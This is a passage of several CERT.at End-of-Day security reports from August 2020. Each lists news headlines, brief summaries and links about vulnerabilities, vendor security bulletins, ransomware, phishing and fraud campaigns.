∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime may affect Tivoli Netcool Performance Manager for Wireless, Oracle January 2020 CPU ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: jackson-databind (Publicly disclosed vulnerability) found in Network Performance Insight (CVE-2020-8840) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-jackson-databind-publicly…
∗∗∗ Security Bulletin: Netcool Operations Insight – Cloud Native Event Analytics is affected by an International Components for Unicode (ICU) for C/C++ vulnerability (CVE-2020-10531) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM® Java SDK affect WebSphere Service Registry and Repository and WebSphere Service Registry and Repository Studio July 2020 CPU plus deferred CVE-2019-2590 and CVE-2020-2601 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: A vulnerability exists in the Event Streams 10.0.0 schema registry that allows unauthorised access to create, edit and delete schemas (CVE-2020-4662) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-exists-in…
∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to a remote code execution vulnerability (CVE-2020-4589) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ Apache Struts: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0824
∗∗∗ PostgreSQL: Multiple vulnerabilities allow privilege escalation ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0825
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 12-08-2020 18:00 − Donnerstag 13-08-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ Avaddon: The Latest RaaS (Ransomware-as-a-Service) to Jump on the Extortion Bandwagon ∗∗∗
---------------------------------------------
As of August 8th, Avaddon ransomware authors launched an extortion site in an effort to further incentivize victims to pay the ransom. Tarik Saleh dissects this ransomware, analyzes victimology, and provides more details on the extortion site.
---------------------------------------------
https://www.domaintools.com/resources/blog/avaddon-the-latest-raas-to-jump-…
∗∗∗ MMS Exploit Part 5: Defeating Android ASLR, Getting RCE ∗∗∗
---------------------------------------------
Posted by Mateusz Jurczyk, Project Zero. This post is the fifth and final of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices.
---------------------------------------------
https://googleprojectzero.blogspot.com/2020/08/mms-exploit-part-5-defeating…
∗∗∗ To the Brim at the Gates of Mordor Pt. 1, (Wed, Aug 12th) ∗∗∗
---------------------------------------------
Search & Analyze Mordor APT29 PCAPs with Brim
---------------------------------------------
https://isc.sans.edu/diary/rss/26456
∗∗∗ Color by numbers: inside a Dharma ransomware-as-a-service attack ∗∗∗
---------------------------------------------
Dharma, a family of ransomware first spotted in 2016, continues to be a threat to many organizations—especially small and medium-sized businesses. Part of the reason for its longevity is that its variants have become the basis for ransomware-as-a-service (RaaS) operations.
---------------------------------------------
https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-r…
∗∗∗ Attribution: A Puzzle ∗∗∗
---------------------------------------------
The attribution of cyber attacks is hard. It requires collecting diverse intelligence, analyzing it and deciding who is responsible. Rarely does the evidence available to researchers reach a level of proof that would be acceptable in a court of law. Nevertheless, the private sector rises to the challenge to attempt to associate cyber attacks to threat actors using the intelligence available to them.
---------------------------------------------
https://blog.talosintelligence.com/2020/08/attribution-puzzle.html
∗∗∗ Criminals try to spread malware through legitimate programs! ∗∗∗
---------------------------------------------
Most people trust well-known software vendors when they update an app, a program or another product, or bring a new product to market. Yet it is precisely this trust that criminals exploit in so-called "supply-chain attacks".
---------------------------------------------
https://www.watchlist-internet.at/news/kriminelle-versuchen-durch-serioese-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Amazon: Security flaw could reveal Alexa voice commands ∗∗∗
---------------------------------------------
Using a specially crafted link, a security flaw in Amazon's infrastructure could be exploited to access other people's Alexa data.
---------------------------------------------
https://www.golem.de/news/amazon-sicherheitsluecke-konnte-alexa-sprachbefeh…
∗∗∗ Cybercriminals Are Infiltrating Netgear Routers with Ancient Attack Methods ∗∗∗
---------------------------------------------
It would be heartening to think that cybersecurity has advanced since the 1990s, but some things never change. Vulnerabilities that some of us first saw in 1996 are still with us.
---------------------------------------------
https://www.tripwire.com/state-of-security/featured/cybercriminals-infiltra…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (dovecot and roundcube), Fedora (python36), Gentoo (chromium), openSUSE (ark, firefox, go1.13, java-11-openjdk, libX11, wireshark, and xen), Red Hat (bind and kernel), SUSE (libreoffice and python36), and Ubuntu (dovecot and software-properties).
---------------------------------------------
https://lwn.net/Articles/828683/
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (linux-4.19, linux-latest-4.19, and openjdk-8) and Fedora (ark and hylafax+).
---------------------------------------------
https://lwn.net/Articles/828744/
∗∗∗ Security Advisory - Insufficient Authentication Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-…
∗∗∗ Security Advisory - Code Execution Vulnerability in Fastjson Affect Several Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-…
∗∗∗ Security Bulletin: Db2 vulnerabilities affect IBM Spectrum Protect Server (CVE-2020-4230, CVE-2020-4135, CVE-2020-4204, CVE-2020-4200) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-db2-vulnerabilities-affec…
∗∗∗ Security Bulletin: Security vulnerability has been identified in BigFix Platform shipped with IBM License Metric Tool. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-ha…
∗∗∗ Security Bulletin: A vulnerability in SQLite affects IBM Cloud Application Performance Management Response Time Monitoring Agent (CVE-2020-9327) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulneraqbility-in-sqlit…
∗∗∗ Security Bulletin: A vulnerability in SQLite affects IBM Cloud Application Performance Management Response Time Monitoring Agent (CVE-2020-11655, CVE-2020-11656) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulneraqbility-in-sqlit…
∗∗∗ Security Bulletin: Apache-Log4j (Publicly disclosed vulnerability) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-log4j-publicly-dis…
∗∗∗ Security Bulletin: Vulnerabilities in IBM Java Runtime affect the IBM Spectrum Protect Server (CVE-2020-2593, CVE-2019-4732) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja…
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to path traversal (CVE-2019-4582) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: Vulnerability in IBM WebSphere Application Server Liberty affects IBM Spectrum Protect Operations Center and Client Management Service (CVE-2019-12406) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-webs…
∗∗∗ Security Bulletin: Security vulnerabilities have been identified in IBM DB2 shipped with IBM License Metric Tool v9. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: A vulnerability in Faster-XML jackson databind affects IBM Operations Analytics Predictive Insights (CVE-2019-144892, CVE-2019-144893) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-faster…
∗∗∗ Sophos XG Firewall: Vulnerability allows code execution ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0823
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 11-08-2020 18:00 − Mittwoch 12-08-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ CEO fraud via WhatsApp and voice messages ∗∗∗
---------------------------------------------
In most known cases, CEO fraud is carried out via e-mail: criminals pose as the CEO/CFO/etc. towards employees who are authorised to make transfers and demand that a large sum be transferred immediately, without consulting anyone else, to a bank account (preferably abroad) in order to close an extremely important deal.
---------------------------------------------
https://cert.at/de/aktuelles/2020/8/ceo-fraud-via-whatsapp-und-sprachnachri…
∗∗∗ Mobile networks: LTE calls could be eavesdropped on despite encryption ∗∗∗
---------------------------------------------
The longer the victim stays on the line, the more of previous conversations can be reconstructed.
---------------------------------------------
https://www.golem.de/news/mobilfunk-lte-anrufe-liessen-sich-trotz-verschlue…
∗∗∗ Code injection vulnerability in SAP Application Server ABAP – Solution Tools Plugin ST-PI ∗∗∗
---------------------------------------------
SAP is one of the largest enterprise software vendors worldwide. Severe security flaws in SAP products could have serious consequences for the security of corporate IT infrastructures.
---------------------------------------------
https://sec-consult.com/blog/2020/08/code-injection-schwachstelle-in-sap-ap…
∗∗∗ FIDO2 for Microsoft Online Accounts / Azure AD ∗∗∗
---------------------------------------------
Nowadays a secure password doesn't necessarily mean your account is safe.
---------------------------------------------
https://sec-consult.com/en/blog/2020/08/fido2-for-microsoft-online-accounts…
∗∗∗ Hunting for SQL injections (SQLis) and Cross-Site Request Forgeries (CSRFs) in WordPress Plugins ∗∗∗
---------------------------------------------
This is a detailed overview of the bugs found while reviewing the source code of WordPress plugins. I cover 3 reported vulnerabilities (CVE-2020-5766, CVE-2020-5767 and CVE-2020-5768) which can be exploited for information disclosure and sending forged emails.
---------------------------------------------
https://medium.com/tenable-techblog/hunting-for-sql-injections-sqlis-and-cr…
=====================
= Vulnerabilities =
=====================
∗∗∗ Patch day: Microsoft closes actively exploited Windows and browser flaws ∗∗∗
---------------------------------------------
For Patch Tuesday, Microsoft has closed, among others, two critical security flaws that were already being abused for attacks.
---------------------------------------------
https://heise.de/-4868224
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firmware-nonfree, golang-github-seccomp-libseccomp-golang, and ruby-kramdown), Fedora (kernel, libmetalink, and nodejs), openSUSE (go1.13, perl-XML-Twig, and thunderbird), Oracle (kernel, libvncserver, and thunderbird), Red Hat (kernel-rt and python-paunch and openstack-tripleo-heat-templates), SUSE (dpdk, google-compute-engine, libX11, webkit2gtk3, xen, and xorg-x11-libX11), and Ubuntu (nss and samba).
---------------------------------------------
https://lwn.net/Articles/828554/
∗∗∗ QNX-2020-001 Vulnerability in slinger web server Impacts BlackBerry QNX Software Development Platform ∗∗∗
---------------------------------------------
http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber…
∗∗∗ Security Advisory - Improper Authorization Vulnerability in Several Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-…
∗∗∗ Security Advisory - Improper Interface Design Vulnerability in Huawei Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-…
∗∗∗ Security Advisory - Command Injection Vulnerability in FusionCompute ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200812-…
∗∗∗ Security Bulletin: Java vulnerabilities affect IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-java-vulnerabilities-affe…
∗∗∗ Security Bulletin: A vulnerability in jQuery affects IBM WIoTP MessageGateway (CVE-2020-7656) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-jquery…
∗∗∗ Security Bulletin: IBM i2 Analysts' Notebook and IBM i2 Analysts' Notebook Premium Memory vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-i2-analysts-notebook-…
∗∗∗ Security Bulletin: OpenSLP vulnerability affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-openslp-vulnerability-aff…
∗∗∗ Security Bulletin: Incorrect permissions on IBM Spectrum Protect Plus agent files (CVE-2020-4631) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-incorrect-permissions-on-…
∗∗∗ Security Bulletin: Vulnerabilities in Apache Camel's JMX, Apache Camel RabbitMQ and Apache Camel Netty affects IBM Operations Analytics Predictive Insights (CVE-2020-11971, CVE-2020-11972, CVE-2020-11973) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in jQuery affect IBM WIoTP MessageGateway ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Network Security (NSS) vulnerability affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-network-security-nss-vuln…
∗∗∗ Security Bulletin: Vulnerabilities in Netty affect IBM Netcool Agile Service Manager (CVE-2020-7238) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-netty-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in jQuery affect IBM WIoTP MessageGateway (CVE-2020-11023, CVE-2020-11022) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ IPAS: Security Advisories for August 2020 ∗∗∗
---------------------------------------------
https://blogs.intel.com/technology/2020/08/ipas-security-advisories-for-aug…
=====================
= End-of-Day report =
=====================
Timeframe: Montag 10-08-2020 18:00 − Dienstag 11-08-2020 18:00
Handler: Dimitri Robl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Upgraded Agent Tesla malware steals passwords from browsers, VPNs ∗∗∗
---------------------------------------------
New variants of Agent Tesla remote access Trojan now come with modules dedicated to stealing credentials from applications including popular web browsers, VPN software, as well as FTP and email clients.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/upgraded-agent-tesla-malware…
∗∗∗ SBA phishing scams: from malware to advanced social engineering ∗∗∗
---------------------------------------------
SBA loan scams continue to make the rounds targeting small business owners, CEOs, and CFOs.
---------------------------------------------
https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware…
∗∗∗ Script-Based Malware: A New Attacker Trend on Internet Explorer ∗∗∗
---------------------------------------------
Script-based malware can be appealing for attackers who want the ability to quickly and easily develop new variants to evade detection.
---------------------------------------------
https://unit42.paloaltonetworks.com/script-based-malware/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security Bulletins Posted ∗∗∗
---------------------------------------------
Adobe has published security bulletins for Adobe Acrobat and Reader (APSB20-48) and Adobe Lightroom (APSB20-51). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin. This posting is provided “AS IS” with no warranties and confers no rights.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1908
∗∗∗ vBulletin fixes ridiculously easy to exploit zero-day RCE bug ∗∗∗
---------------------------------------------
A simple one-line exploit has been published for a zero-day pre-authentication remote code execution (RCE) vulnerability in the vBulletin forum software.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/vbulletin-fixes-ridiculously…
∗∗∗ Critical updates for Citrix Endpoint Management ∗∗∗
---------------------------------------------
Citrix closes a total of 5 flaws; anyone running their own installation should patch quickly.
---------------------------------------------
https://heise.de/-4867952
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (pillow, ruby-kramdown, wpa, and xrdp), Fedora (ark and rpki-client), Gentoo (apache, ark, global, gthumb, and iproute2), openSUSE (chromium, grub2, java-11-openjdk, libX11, and opera), Red Hat (bind, chromium-browser, java-1.7.1-ibm, java-1.8.0-ibm, and libvncserver), SUSE (LibVNCServer, perl-XML-Twig, thunderbird, and xen), and Ubuntu (samba).
---------------------------------------------
https://lwn.net/Articles/828476/
∗∗∗ iCloud for Windows 11.3 ∗∗∗
---------------------------------------------
https://support.apple.com/kb/HT211294
∗∗∗ iCloud for Windows 7.20 ∗∗∗
---------------------------------------------
https://support.apple.com/kb/HT211295
∗∗∗ SSA-809841: Buffer Overflow Vulnerability in Third-Party Component pppd ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-809841.txt
∗∗∗ SSA-786743: Code Injection Vulnerability in Advanced Reporting for Desigo CC and ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-786743.txt
∗∗∗ SSA-712518: Information Disclosure Vulnerability (Kr00k) in Industrial Wi-Fi ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-712518.txt
∗∗∗ SSA-388646: Local Privilege Escalation in Automation License Manager ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-388646.txt
∗∗∗ SSA-370042: Cross-Site-Scripting (XSS) in SICAM A8000 RTUs ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-370042.txt
∗∗∗ Security Bulletin: IBM Event Streams is affected by multiple Java vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe…
∗∗∗ Security Bulletin: IBM Event Streams affected by multiple vulnerabilities in OpenSSL package ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-affecte…
∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Bind affect IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: IBM Event Streams is affected by multiple Node.js vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe…
∗∗∗ Security Bulletin: JQuery as used by IBM QRadar Network Packet Capture is vulnerable to Cross Site Scripting (XSS) (CVE-2020-11023, CVE-2020-11022) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-jquery-as-used-by-ibm-qra…
∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: IBM Event Streams is affected by a vulnerability in Apache Commons Compress (CVE-2019-12402) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe…
∗∗∗ Security Bulletin: IBM Event Streams is affected by a Java vulnerability (CVE-2020-2654) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe…
∗∗∗ Security Bulletin: Information disclosure in WebSphere Liberty (CVE-2020-4329) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-in…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Libreswan affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ SAP Patch Day August 2020 ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0800
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 07-08-2020 18:00 − Montag 10-08-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ DDoS attacks in Q2 2020 ∗∗∗
---------------------------------------------
The second quarter is normally calmer than the first, but this year is an exception. The long-term downward trend in DDoS-attacks has unfortunately been interrupted, and this time we are witnessing an increase.
---------------------------------------------
https://securelist.com/ddos-attacks-in-q2-2020/98077/
∗∗∗ Scanning Activity Includes Netcat Listener, (Sat, Aug 8th) ∗∗∗
---------------------------------------------
This activity started on the 5 July 2020 and has been active to this day only scanning against TCP port 81. The GET command is always the same except for the Netcat IP which has changed a few times since it started. If you have a webserver or a honeypot listening on TCP 81, this activity might be contained in your logs.
---------------------------------------------
https://isc.sans.edu/diary/rss/26442
∗∗∗ Scoping web application and web service penetration tests, (Mon, Aug 10th) ∗∗∗
---------------------------------------------
Before starting any penetration test, the most important part is to correctly scope it - this will ensure both that the client's expectations are fulfilled and that enough time is allocated to make sure that the penetration test is correctly performed.
---------------------------------------------
https://isc.sans.edu/diary/rss/26448
∗∗∗ Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts ∗∗∗
---------------------------------------------
A series of ongoing business email compromise (BEC) campaigns that use spear-phishing schemes on Office 365 accounts has been seen targeting business executives of over 1,000 companies across the world since March 2020. The recent campaigns target senior positions in the United States and Canada.
---------------------------------------------
https://blog.trendmicro.com/trendlabs-security-intelligence/water-nue-campa…
∗∗∗ DEF CON 28: Introduction to ACARS ∗∗∗
---------------------------------------------
This post is a companion to the DEF CON 28 video available here: https://www.youtube.com/watch?v=NFS6qNAi0B8 What is ACARS? ACARS (Aircraft Communications Addressing and Reporting System, pronounced ‘ay-cars’) [...]
---------------------------------------------
https://www.pentestpartners.com/security-blog/introduction-to-acars/
∗∗∗ Small and medium‑sized businesses: Big targets for ransomware attacks ∗∗∗
---------------------------------------------
Why are SMBs a target for ransomware-wielding gangs and what can they do to protect themselves against cyber-extortion?
---------------------------------------------
https://www.welivesecurity.com/2020/08/07/small-medium-sized-businesses-big…
=====================
= Vulnerabilities =
=====================
∗∗∗ Researcher Demonstrates Several Zoom Vulnerabilities at DEF CON 28 ∗∗∗
---------------------------------------------
Popular video conferencing app Zoom has addressed several security vulnerabilities, two of which affect its Linux client that could have allowed an attacker with access to a compromised system to read and exfiltrate Zoom user data—and even run stealthy malware as a sub-process of a trusted application.
---------------------------------------------
https://thehackernews.com/2020/08/zoom-software-vulnerabilities.html
∗∗∗ TeamViewer: remote maintenance tool had a dangerous vulnerability ∗∗∗
---------------------------------------------
Anyone who has not updated TeamViewer on Windows for a while should do so promptly: a vulnerability allowed (and may still allow) unauthorized remote access under certain circumstances.
---------------------------------------------
https://heise.de/-4866337
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (firefox, java-1.8.0-openjdk, java-11-openjdk, libvncserver, postgresql-jdbc, and thunderbird), Debian (firejail and gupnp), Fedora (cutter-re, postgresql-jdbc, radare2, and webkit2gtk3), openSUSE (chromium, firefox, kernel, and python-rtslib-fb), Oracle (container-tools:ol8, kernel, and nss and nspr), Scientific Linux (thunderbird), and SUSE (firefox, kernel, postgresql10 and postgresql12, python-ipaddress, and xen).
---------------------------------------------
https://lwn.net/Articles/828309/
∗∗∗ Security Bulletin: Security vulnerability affects the Report Builder that is shipped with Jazz Reporting Service (CVE-2020-4541) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-af…
∗∗∗ Security Bulletin: Financial Transaction Manager for Check Services is affected by a potential information disclosure id 177835 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affects WebSphere Application Server July 2020 CPU that is bundled with IBM WebSphere Application Server Patterns ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Security vulnerability affects the Lifecycle Query Engine that is shipped with Jazz Reporting Service (CVE-2020-4533) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-af…
∗∗∗ Security Bulletin: Financial Transaction Manager for Corporate Payment Services is affected by a potential information disclosure id 177835 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man…
∗∗∗ Security Bulletin: Vulnerability in IBM Java Runtime affects Financial Transaction Manager for Corporate Payment Services (CVE-2020-2654) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects Financial Transaction Manager for Check Services (CVE-2019-4732) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Security vulnerability affects the Lifecycle Query Engine that is shipped with Jazz Reporting Service (CVE-2020-4539) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-af…
∗∗∗ Security Bulletin: Version 10.19.0 of Node.js included in IBM Netcool Operations Insight 1.6.0.x has several security vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-version-10-19-0-of-node-j…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 06-08-2020 18:00 − Friday 07-08-2020 18:00
Handler: Dimitri Robl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Security vulnerabilities: millions of smartphones with Snapdragon chips vulnerable ∗∗∗
---------------------------------------------
The DSP processor in Qualcomm's widely used Snapdragon chips contains hundreds of security vulnerabilities.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecken-millionen-smartphones-mit-snap…
∗∗∗ Exploiting Android Messengers with WebRTC: Part 3 ∗∗∗
---------------------------------------------
Posted by Natalie Silvanovich, Project Zero. This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. CVE-2020-6514 discussed in the blog post was fixed on July 14 with these CLs. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down.
---------------------------------------------
https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messenger…
∗∗∗ Spam and phishing in Q2 2020 ∗∗∗
---------------------------------------------
In Q2 2020, the largest share of spam (51.45 percent) was recorded in April. The average percentage of spam in global email traffic was 50.18%, down by 4.43 percentage points from the previous reporting period.
---------------------------------------------
https://securelist.com/spam-and-phishing-in-q2-2020/97987/
∗∗∗ TA551 (Shathak) Word docs push IcedID (Bokbot), (Fri, Aug 7th) ∗∗∗
---------------------------------------------
I've been tracking malicious Word documents from the TA551 (Shathak) campaign. This year, we've seen a lot of Valak malware from TA551, but in recent weeks this campaign has been pushing IcedID malware to English-speaking targets.
---------------------------------------------
https://isc.sans.edu/diary/rss/26438
∗∗∗ Making the Most Out of WLAN Event Log Artifacts ∗∗∗
---------------------------------------------
If you have taken FOR500 (Windows Forensic Analysis) or utilize the FOR500 "Evidence of..." poster, you are probably familiar with the WLAN Event Log listed under the Network Activity/Physical Location section of the poster. This Windows event log (Microsoft-Windows-WLAN-AutoConfig/Operational) records wireless networks that a system has associated with as well as captures network characteristics that can be used for geolocation. In recent testing involving this artifact, a discovery was made that may have implications for investigators. I will outline a scenario that illustrates the issue and present artifacts to help solve it.
---------------------------------------------
https://www.sans.org/blog/making-the-most-out-of-wlan-event-log-artifacts/
∗∗∗ Bypassing MassLogger Anti-Analysis — a Man-in-the-Middle Approach ∗∗∗
---------------------------------------------
The FireEye Front Line Applied Research & Expertise (FLARE) Team attempts to always stay on top of the most current and emerging threats. As a member of the FLARE Reverse Engineer team, I recently received a request to analyze a fairly new credential stealer identified as MassLogger. Despite the lack of novel functionalities and features, this sample employs a sophisticated technique that replaces the Microsoft Intermediate Language (MSIL) at run time to hinder static analysis.
---------------------------------------------
http://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-an…
∗∗∗ Stuxnet 2.0: researchers bring an old security nightmare back to life ∗∗∗
---------------------------------------------
At Black Hat USA 2020, researchers pointed out, among other things, a zero-day vulnerability in the Windows Print Spooler service. A patch from Microsoft is expected to follow soon.
---------------------------------------------
https://heise.de/-4865010
∗∗∗ Inter skimming kit used in homoglyph attacks ∗∗∗
---------------------------------------------
Threat actors load credit card skimmers using a known phishing technique called homoglyph attacks.
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/2020/08/inter-skimming-kit-us…
∗∗∗ WordPress Auto-Updates: What do you have to lose? ∗∗∗
---------------------------------------------
A new feature that will allow automatic updating of plugins and themes will be available in WordPress version 5.5, which is scheduled to be released on August 11, 2020. In this core release of the world’s most popular content management system, site owners will have the option to turn auto-updates on for individual plugins and themes directly from the WordPress admin dashboard.
---------------------------------------------
https://www.wordfence.com/blog/2020/08/wordpress-auto-updates-what-do-you-h…
∗∗∗ Security Awareness is as valuable today as ever ∗∗∗
---------------------------------------------
A while ago I saw a tweet that initially angered me for many reasons, but then I thought about it and wondered how much effort do companies put in to awareness and training.
---------------------------------------------
https://www.pentestpartners.com/security-blog/security-awareness-is-as-valu…
∗∗∗ Numerous fake shops lure with cheap pools, grills and patio furniture ∗∗∗
---------------------------------------------
Whether swimming in your own pool, firing up the grill, tending the plants or simply enjoying the sun on the patio: summertime is garden time. Scammers see it that way too. Readers of Watchlist Internet are currently reporting numerous fake shops offering products for a nice summer in the garden. So take a close look at supposed online shops that want to sell you cheap pools, grills, patio furniture or lawn mowers!
---------------------------------------------
https://www.watchlist-internet.at/news/zahlreiche-fake-shops-locken-mit-gue…
∗∗∗ Upgrade of our ticket system 2020-08-07 ∗∗∗
---------------------------------------------
